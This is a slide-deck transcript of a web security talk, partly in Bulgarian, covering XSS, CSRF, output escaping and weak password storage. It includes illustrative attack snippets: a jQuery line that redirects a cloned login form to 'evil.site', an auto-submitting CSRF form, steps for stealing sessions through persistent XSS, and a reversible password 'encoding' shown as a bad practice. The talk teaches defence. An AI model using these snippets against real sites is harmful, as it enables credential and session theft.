Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Security

Web Security

Georgy Angelov

March 28, 2014
Tweet

More Decks by Georgy Angelov

Other Decks in Programming

Transcript

 1. Ще говоря и за неща, които по принцип са ясни

  и логични, но се оказва, че доста често ги пропускаме.
 2. An attack vector is a path or means by which

  a hacker (or cracker) can gain access to a computer or website in order to deliver a payload or malicious outcome. Attack vectors enable hackers to exploit system vulnerabilities, including the human element.
 3. Дублиране на страници $.get(‘http://website.com/login’, function(html) { $(‘body’).append(html); $(‘form’).attr(‘action’, ‘http://evil.site/login’); });

  Това точно няма да сработи заради Access Control Origin, но ако сървъра зареди html-a всичко ще е наред.
 4. Ще кажете “ама не трябва да е GET” <form action=“http://website.com/user/delete”

  method=“POST”> <input type=“hidden” name=“confirm” value=“1”> </form> <script>$(‘form’).submit();</script>
 5. Persistent XSS 1. Събмитваме текст в някое поле, съдържащ въпросния

  скрипт. 2. Потребител отваря профила ни. 3. Открадваме сесията му. 4. Логваме се с нея. 5. WIN
 6. <h2><%= params.error %></h2> В ERB, EJS и някои други това

  е ОК, защото самия темплейт енджин кодира HTML знаците в текста.
 7. Решението е лесно и ясно &  &amp; < 

  &lt; >  &gt; "  &quot; '  &#x27; /  &#x2F;
 8. “Passwords are never stored in plaintext. At least they shouldn't

  be, unless you're building the world's most insecure system using the world's most naive programmers.” - случаен човек в нета
 9. protected String encodePassword(String password) { String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1"; StringBuilder

  result = new StringBuilder(); for (int i = 0; i < password.length(); i ++) { result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1)); } return result.toString(); }
 10. protected String decodePassword(String password) { String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1"; ref

  = new StringBuilder(ref).reverse().toString(); StringBuilder result = new StringBuilder(); for (int i = 0; i < password.length(); i ++) { result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1)); } return result.toString(); } Java
 11. conseq([X,Y|L], X, Y). conseq([_|L], X, Y) :- conseq(L, X, Y).

  mapNext(Code, [], []). mapNext(Code, [X|L], [Y|LRes]) :- conseq(Code, X, Y), mapNext(Code, L, LRes). ?- string_codes(' 1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1 ', Code), string_codes('123', L), mapNext(Code, L, X), write(X). Prolog
 12. На един по-мощен настолен компютър • MD5 – 8 000

  000 000 пароли в секунда • SHA1 – 3 000 000 000 пароли в секунда • SHA256 – 1 100 000 000 пароли в секунда
 13. Не е fail, но все пак – brute-force от 40

  000 различни IP адреса. https://github.com/blog/1698-weak-passwords-brute-forced